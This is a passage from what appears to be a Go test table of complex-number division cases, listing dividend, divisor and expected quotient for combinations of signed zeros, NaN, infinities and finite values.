complex(zero, 1), complex(zero, -1)}, {complex(1, zero), complex(zero, -1), complex(-zero, 1)}, {complex(1, zero), complex(zero, 2), complex(zero, -0.5)}, {complex(1, zero), complex(nan, nan), complex(nan, nan)}, {complex(1, zero), complex(nan, inf), complex(zero, -zero)}, {complex(1, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(1, zero), complex(zero, zero), complex(inf, nan)}, {complex(1, zero), complex(-zero, -zero), complex(-inf, nan)}, {complex(1, zero), complex(zero, 1), complex(zero, -1)}, {complex(1, zero), complex(-zero, -1), complex(-zero, 1)}, {complex(1, zero), complex(zero, 2), complex(zero, -0.5)}, {complex(1, zero), complex(nan, nan), complex(nan, nan)}, {complex(1, zero), complex(nan, inf), complex(zero, -zero)}, {complex(1, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(1, zero), complex(1, zero), complex(1, zero)}, {complex(1, zero), complex(1, -zero), complex(1, zero)}, {complex(1, zero), complex(1, 1), complex(0.5, -0.5)}, {complex(1, zero), complex(1, -1), complex(0.5, 0.5)}, {complex(1, zero), complex(1, 2), complex(0.2, -0.4)}, {complex(1, zero), complex(nan, nan), complex(nan, nan)}, {complex(1, zero), complex(nan, inf), complex(zero, -zero)}, {complex(1, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(1, zero), complex(-1, zero), complex(-1, -zero)}, {complex(1, zero), complex(-1, -zero), complex(-1, -zero)}, {complex(1, zero), complex(-1, 1), complex(-0.5, -0.5)}, {complex(1, zero), complex(-1, -1), complex(-0.5, 0.5)}, {complex(1, zero), complex(-1, 2), complex(-0.2, -0.4)}, {complex(1, zero), complex(nan, nan), complex(nan, nan)}, {complex(1, zero), complex(nan, inf), complex(zero, -zero)}, {complex(1, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(1, zero), complex(2, zero), complex(0.5, zero)}, {complex(1, zero), complex(2, -zero), complex(0.5, zero)}, {complex(1, zero), complex(2, 1), complex(0.4, -0.2)}, {complex(1, zero), complex(2, -1), complex(0.4, 0.2)}, {complex(1, zero), complex(2, 2), complex(0.25, -0.25)}, {complex(1, zero), complex(nan, nan), complex(nan, nan)}, {complex(1, zero), complex(nan, inf), complex(zero, -zero)}, {complex(1, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(1, zero), complex(nan, zero), complex(nan, nan)}, {complex(1, zero), complex(nan, -zero), complex(nan, nan)}, {complex(1, zero), complex(nan, 1), complex(nan, nan)}, {complex(1, zero), complex(nan, -1), complex(nan, nan)}, {complex(1, zero), complex(nan, 2), complex(nan, nan)}, {complex(1, zero), complex(nan, nan), complex(nan, nan)}, {complex(1, zero), complex(nan, inf), complex(zero, -zero)}, {complex(1, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(1, zero), complex(inf, zero), complex(zero, zero)}, {complex(1, zero), complex(inf, -zero), complex(zero, zero)}, {complex(1, zero), complex(inf, 1), complex(zero, zero)}, {complex(1, zero), complex(inf, -1), complex(zero, zero)}, {complex(1, zero), complex(inf, 2), complex(zero, zero)}, {complex(1, zero), complex(nan, nan), complex(nan, nan)}, {complex(1, zero), complex(nan, inf), complex(zero, -zero)}, {complex(1, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(1, zero), complex(-inf, zero), complex(-zero, -zero)}, {complex(1, zero), complex(-inf, -zero), complex(-zero, -zero)}, {complex(1, zero), complex(-inf, 1), complex(-zero, -zero)}, {complex(1, zero), complex(-inf, -1), complex(-zero, -zero)}, {complex(1, zero), complex(-inf, 2), complex(-zero, -zero)}, {complex(1, zero), complex(nan, nan), complex(nan, nan)}, {complex(1, zero), complex(nan, inf), complex(zero, -zero)}, {complex(1, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(1, -zero), complex(zero, zero), complex(inf, nan)}, {complex(1, -zero), complex(zero, -zero), complex(inf, nan)}, {complex(1, -zero), complex(zero, 1), complex(zero, -1)}, {complex(1, -zero), complex(zero, -1), complex(zero, 1)}, {complex(1, -zero), complex(zero, 2), complex(zero, -0.5)}, {complex(1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(1, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(1, -zero), complex(zero, zero), complex(inf, nan)}, {complex(1, -zero), complex(-zero, -zero), complex(-inf, nan)}, {complex(1, -zero), complex(zero, 1), complex(zero, -1)}, {complex(1, -zero), complex(-zero, -1), complex(-zero, 1)}, {complex(1, -zero), complex(zero, 2), complex(zero, -0.5)}, {complex(1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(1, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(1, -zero), complex(1, zero), complex(1, -zero)}, {complex(1, -zero), complex(1, -zero), complex(1, zero)}, {complex(1, -zero), complex(1, 1), complex(0.5, -0.5)}, {complex(1, -zero), complex(1, -1), complex(0.5, 0.5)}, {complex(1, -zero), complex(1, 2), complex(0.2, -0.4)}, {complex(1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(1, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(1, -zero), complex(-1, zero), complex(-1, -zero)}, {complex(1, -zero), complex(-1, -zero), complex(-1, zero)}, {complex(1, -zero), complex(-1, 1), complex(-0.5, -0.5)}, {complex(1, -zero), complex(-1, -1), complex(-0.5, 0.5)}, {complex(1, -zero), complex(-1, 2), complex(-0.2, -0.4)}, {complex(1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(1, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(1, -zero), complex(2, zero), complex(0.5, -zero)}, {complex(1, -zero), complex(2, -zero), complex(0.5, zero)}, {complex(1, -zero), complex(2, 1), complex(0.4, -0.2)}, {complex(1, -zero), complex(2, -1), complex(0.4, 0.2)}, {complex(1, -zero), complex(2, 2), complex(0.25, -0.25)}, {complex(1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(1, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(1, -zero), complex(nan, zero), complex(nan, nan)}, {complex(1, -zero), complex(nan, -zero), complex(nan, nan)}, {complex(1, -zero), complex(nan, 1), complex(nan, nan)}, {complex(1, -zero), complex(nan, -1), complex(nan, nan)}, {complex(1, -zero), complex(nan, 2), complex(nan, nan)}, {complex(1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(1, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(1, -zero), complex(inf, zero), complex(zero, -zero)}, {complex(1, -zero), complex(inf, -zero), complex(zero, zero)}, {complex(1, -zero), complex(inf, 1), complex(zero, -zero)}, {complex(1, -zero), complex(inf, -1), complex(zero, zero)}, {complex(1, -zero), complex(inf, 2), complex(zero, -zero)}, {complex(1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(1, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(1, -zero), complex(-inf, zero), complex(-zero, -zero)}, {complex(1, -zero), complex(-inf, -zero), complex(-zero, zero)}, {complex(1, -zero), complex(-inf, 1), complex(-zero, -zero)}, {complex(1, -zero), complex(-inf, -1), complex(-zero, zero)}, {complex(1, -zero), complex(-inf, 2), complex(-zero, -zero)}, {complex(1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(1, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(1, 1), complex(zero, zero), complex(inf, inf)}, {complex(1, 1), complex(zero, -zero), complex(inf, inf)}, {complex(1, 1), complex(zero, 1), complex(1, -1)}, {complex(1, 1), complex(zero, -1), complex(-1, 1)}, {complex(1, 1), complex(zero, 2), complex(0.5, -0.5)}, {complex(1, 1), complex(nan, nan), complex(nan, nan)}, {complex(1, 1), complex(nan, inf), complex(zero, -zero)}, {complex(1, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 1), complex(zero, zero), complex(inf, inf)}, {complex(1, 1), complex(-zero, -zero), complex(-inf, -inf)}, {complex(1, 1), complex(zero, 1), complex(1, -1)}, {complex(1, 1), complex(-zero, -1), complex(-1, 1)}, {complex(1, 1), complex(zero, 2), complex(0.5, -0.5)}, {complex(1, 1), complex(nan, nan), complex(nan, nan)}, {complex(1, 1), complex(nan, inf), complex(zero, -zero)}, {complex(1, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 1), complex(1, zero), complex(1, 1)}, {complex(1, 1), complex(1, -zero), complex(1, 1)}, {complex(1, 1), complex(1, 1), complex(1, zero)}, {complex(1, 1), complex(1, -1), complex(zero, 1)}, {complex(1, 1), complex(1, 2), complex(0.6, -0.2)}, {complex(1, 1), complex(nan, nan), complex(nan, nan)}, {complex(1, 1), complex(nan, inf), complex(zero, -zero)}, {complex(1, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 1), complex(-1, zero), complex(-1, -1)}, {complex(1, 1), complex(-1, -zero), complex(-1, -1)}, {complex(1, 1), complex(-1, 1), complex(-zero, -1)}, {complex(1, 1), complex(-1, -1), complex(-1, -zero)}, {complex(1, 1), complex(-1, 2), complex(0.2, -0.6)}, {complex(1, 1), complex(nan, nan), complex(nan, nan)}, {complex(1, 1), complex(nan, inf), complex(zero, -zero)}, {complex(1, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 1), complex(2, zero), complex(0.5, 0.5)}, {complex(1, 1), complex(2, -zero), complex(0.5, 0.5)}, {complex(1, 1), complex(2, 1), complex(0.6, 0.2)}, {complex(1, 1), complex(2, -1), complex(0.2, 0.6)}, {complex(1, 1), complex(2, 2), complex(0.5, zero)}, {complex(1, 1), complex(nan, nan), complex(nan, nan)}, {complex(1, 1), complex(nan, inf), complex(zero, -zero)}, {complex(1, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 1), complex(nan, zero), complex(nan, nan)}, {complex(1, 1), complex(nan, -zero), complex(nan, nan)}, {complex(1, 1), complex(nan, 1), complex(nan, nan)}, {complex(1, 1), complex(nan, -1), complex(nan, nan)}, {complex(1, 1), complex(nan, 2), complex(nan, nan)}, {complex(1, 1), complex(nan, nan), complex(nan, nan)}, {complex(1, 1), complex(nan, inf), complex(zero, -zero)}, {complex(1, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 1), complex(inf, zero), complex(zero, zero)}, {complex(1, 1), complex(inf, -zero), complex(zero, zero)}, {complex(1, 1), complex(inf, 1), complex(zero, zero)}, {complex(1, 1), complex(inf, -1), complex(zero, zero)}, {complex(1, 1), complex(inf, 2), complex(zero, zero)}, {complex(1, 1), complex(nan, nan), complex(nan, nan)}, {complex(1, 1), complex(nan, inf), complex(zero, -zero)}, {complex(1, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 1), complex(-inf, zero), complex(-zero, -zero)}, {complex(1, 1), complex(-inf, -zero), complex(-zero, -zero)}, {complex(1, 1), complex(-inf, 1), complex(-zero, -zero)}, {complex(1, 1), complex(-inf, -1), complex(-zero, -zero)}, {complex(1, 1), complex(-inf, 2), complex(-zero, -zero)}, {complex(1, 1), complex(nan, nan), complex(nan, nan)}, {complex(1, 1), complex(nan, inf), complex(zero, -zero)}, {complex(1, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(1, -1), complex(zero, zero), complex(inf, -inf)}, {complex(1, -1), complex(zero, -zero), complex(inf, -inf)}, {complex(1, -1), complex(zero, 1), complex(-1, -1)}, {complex(1, -1), complex(zero, -1), complex(1, 1)}, {complex(1, -1), complex(zero, 2), complex(-0.5, -0.5)}, {complex(1, -1), complex(nan, nan), complex(nan, nan)}, {complex(1, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -1), complex(nan, -inf), complex(zero, zero)}, {complex(1, -1), complex(zero, zero), complex(inf, -inf)}, {complex(1, -1), complex(-zero, -zero), complex(-inf, inf)}, {complex(1, -1), complex(zero, 1), complex(-1, -1)}, {complex(1, -1), complex(-zero, -1), complex(1, 1)}, {complex(1, -1), complex(zero, 2), complex(-0.5, -0.5)}, {complex(1, -1), complex(nan, nan), complex(nan, nan)}, {complex(1, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -1), complex(nan, -inf), complex(zero, zero)}, {complex(1, -1), complex(1, zero), complex(1, -1)}, {complex(1, -1), complex(1, -zero), complex(1, -1)}, {complex(1, -1), complex(1, 1), complex(zero, -1)}, {complex(1, -1), complex(1, -1), complex(1, zero)}, {complex(1, -1), complex(1, 2), complex(-0.2, -0.6)}, {complex(1, -1), complex(nan, nan), complex(nan, nan)}, {complex(1, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -1), complex(nan, -inf), complex(zero, zero)}, {complex(1, -1), complex(-1, zero), complex(-1, 1)}, {complex(1, -1), complex(-1, -zero), complex(-1, 1)}, {complex(1, -1), complex(-1, 1), complex(-1, -zero)}, {complex(1, -1), complex(-1, -1), complex(-zero, 1)}, {complex(1, -1), complex(-1, 2), complex(-0.6, -0.2)}, {complex(1, -1), complex(nan, nan), complex(nan, nan)}, {complex(1, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -1), complex(nan, -inf), complex(zero, zero)}, {complex(1, -1), complex(2, zero), complex(0.5, -0.5)}, {complex(1, -1), complex(2, -zero), complex(0.5, -0.5)}, {complex(1, -1), complex(2, 1), complex(0.2, -0.6)}, {complex(1, -1), complex(2, -1), complex(0.6, -0.2)}, {complex(1, -1), complex(2, 2), complex(zero, -0.5)}, {complex(1, -1), complex(nan, nan), complex(nan, nan)}, {complex(1, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -1), complex(nan, -inf), complex(zero, zero)}, {complex(1, -1), complex(nan, zero), complex(nan, nan)}, {complex(1, -1), complex(nan, -zero), complex(nan, nan)}, {complex(1, -1), complex(nan, 1), complex(nan, nan)}, {complex(1, -1), complex(nan, -1), complex(nan, nan)}, {complex(1, -1), complex(nan, 2), complex(nan, nan)}, {complex(1, -1), complex(nan, nan), complex(nan, nan)}, {complex(1, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -1), complex(nan, -inf), complex(zero, zero)}, {complex(1, -1), complex(inf, zero), complex(zero, -zero)}, {complex(1, -1), complex(inf, -zero), complex(zero, -zero)}, {complex(1, -1), complex(inf, 1), complex(zero, -zero)}, {complex(1, -1), complex(inf, -1), complex(zero, -zero)}, {complex(1, -1), complex(inf, 2), complex(zero, -zero)}, {complex(1, -1), complex(nan, nan), complex(nan, nan)}, {complex(1, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -1), complex(nan, -inf), complex(zero, zero)}, {complex(1, -1), complex(-inf, zero), complex(-zero, zero)}, {complex(1, -1), complex(-inf, -zero), complex(-zero, zero)}, {complex(1, -1), complex(-inf, 1), complex(-zero, zero)}, {complex(1, -1), complex(-inf, -1), complex(-zero, zero)}, {complex(1, -1), complex(-inf, 2), complex(-zero, zero)}, {complex(1, -1), complex(nan, nan), complex(nan, nan)}, {complex(1, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(1, -1), complex(nan, -inf), complex(zero, zero)}, {complex(1, 2), complex(zero, zero), complex(inf, inf)}, {complex(1, 2), complex(zero, -zero), complex(inf, inf)}, {complex(1, 2), complex(zero, 1), complex(2, -1)}, {complex(1, 2), complex(zero, -1), complex(-2, 1)}, {complex(1, 2), complex(zero, 2), complex(1, -0.5)}, {complex(1, 2), complex(nan, nan), complex(nan, nan)}, {complex(1, 2), complex(nan, inf), complex(zero, -zero)}, {complex(1, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 2), complex(zero, zero), complex(inf, inf)}, {complex(1, 2), complex(-zero, -zero), complex(-inf, -inf)}, {complex(1, 2), complex(zero, 1), complex(2, -1)}, {complex(1, 2), complex(-zero, -1), complex(-2, 1)}, {complex(1, 2), complex(zero, 2), complex(1, -0.5)}, {complex(1, 2), complex(nan, nan), complex(nan, nan)}, {complex(1, 2), complex(nan, inf), complex(zero, -zero)}, {complex(1, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 2), complex(1, zero), complex(1, 2)}, {complex(1, 2), complex(1, -zero), complex(1, 2)}, {complex(1, 2), complex(1, 1), complex(1.5, 0.5)}, {complex(1, 2), complex(1, -1), complex(-0.5, 1.5)}, {complex(1, 2), complex(1, 2), complex(1, zero)}, {complex(1, 2), complex(nan, nan), complex(nan, nan)}, {complex(1, 2), complex(nan, inf), complex(zero, -zero)}, {complex(1, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 2), complex(-1, zero), complex(-1, -2)}, {complex(1, 2), complex(-1, -zero), complex(-1, -2)}, {complex(1, 2), complex(-1, 1), complex(0.5, -1.5)}, {complex(1, 2), complex(-1, -1), complex(-1.5, -0.5)}, {complex(1, 2), complex(-1, 2), complex(0.6, -0.8)}, {complex(1, 2), complex(nan, nan), complex(nan, nan)}, {complex(1, 2), complex(nan, inf), complex(zero, -zero)}, {complex(1, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 2), complex(2, zero), complex(0.5, 1)}, {complex(1, 2), complex(2, -zero), complex(0.5, 1)}, {complex(1, 2), complex(2, 1), complex(0.8, 0.6)}, {complex(1, 2), complex(2, -1), complex(zero, 1)}, {complex(1, 2), complex(2, 2), complex(0.75, 0.25)}, {complex(1, 2), complex(nan, nan), complex(nan, nan)}, {complex(1, 2), complex(nan, inf), complex(zero, -zero)}, {complex(1, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 2), complex(nan, zero), complex(nan, nan)}, {complex(1, 2), complex(nan, -zero), complex(nan, nan)}, {complex(1, 2), complex(nan, 1), complex(nan, nan)}, {complex(1, 2), complex(nan, -1), complex(nan, nan)}, {complex(1, 2), complex(nan, 2), complex(nan, nan)}, {complex(1, 2), complex(nan, nan), complex(nan, nan)}, {complex(1, 2), complex(nan, inf), complex(zero, -zero)}, {complex(1, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 2), complex(inf, zero), complex(zero, zero)}, {complex(1, 2), complex(inf, -zero), complex(zero, zero)}, {complex(1, 2), complex(inf, 1), complex(zero, zero)}, {complex(1, 2), complex(inf, -1), complex(zero, zero)}, {complex(1, 2), complex(inf, 2), complex(zero, zero)}, {complex(1, 2), complex(nan, nan), complex(nan, nan)}, {complex(1, 2), complex(nan, inf), complex(zero, -zero)}, {complex(1, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(1, 2), complex(-inf, zero), complex(-zero, -zero)}, {complex(1, 2), complex(-inf, -zero), complex(-zero, -zero)}, {complex(1, 2), complex(-inf, 1), complex(-zero, -zero)}, {complex(1, 2), complex(-inf, -1), complex(-zero, -zero)}, {complex(1, 2), complex(-inf, 2), complex(-zero, -zero)}, {complex(1, 2), complex(nan, nan), complex(nan, nan)}, {complex(1, 2), complex(nan, inf), complex(zero, -zero)}, {complex(1, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(1, zero), complex(nan, nan)}, {complex(nan, nan), complex(1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(1, 1), complex(nan, nan)}, {complex(nan, nan), complex(1, -1), complex(nan, nan)}, {complex(nan, nan), complex(1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-1, zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, 1), complex(nan, nan)}, {complex(nan, nan), complex(-1, -1), complex(nan, nan)}, {complex(nan, nan), complex(-1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(2, zero), complex(nan, nan)}, {complex(nan, nan), complex(2, -zero), complex(nan, nan)}, {complex(nan, nan), complex(2, 1), complex(nan, nan)}, {complex(nan, nan), complex(2, -1), complex(nan, nan)}, {complex(nan, nan), complex(2, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, -zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, 1), complex(nan, nan)}, {complex(nan, nan), complex(nan, -1), complex(nan, nan)}, {complex(nan, nan), complex(nan, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, -zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(-zero, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(-zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(1, zero), complex(nan, inf)}, {complex(nan, inf), complex(1, -zero), complex(nan, inf)}, {complex(nan, inf), complex(1, 1), complex(inf, inf)}, {complex(nan, inf), complex(1, -1), complex(-inf, inf)}, {complex(nan, inf), complex(1, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-1, zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, 1), complex(inf, -inf)}, {complex(nan, inf), complex(-1, -1), complex(-inf, -inf)}, {complex(nan, inf), complex(-1, 2), complex(inf, -inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(2, zero), complex(nan, inf)}, {complex(nan, inf), complex(2, -zero), complex(nan, inf)}, {complex(nan, inf), complex(2, 1), complex(inf, inf)}, {complex(nan, inf), complex(2, -1), complex(-inf, inf)}, {complex(nan, inf), complex(2, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(-zero, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(-zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(1, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(1, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(1, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-1, zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, 1), complex(-inf, inf)}, {complex(nan, -inf), complex(-1, -1), complex(inf, inf)}, {complex(nan, -inf), complex(-1, 2), complex(-inf, inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(2, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(2, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(2, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, 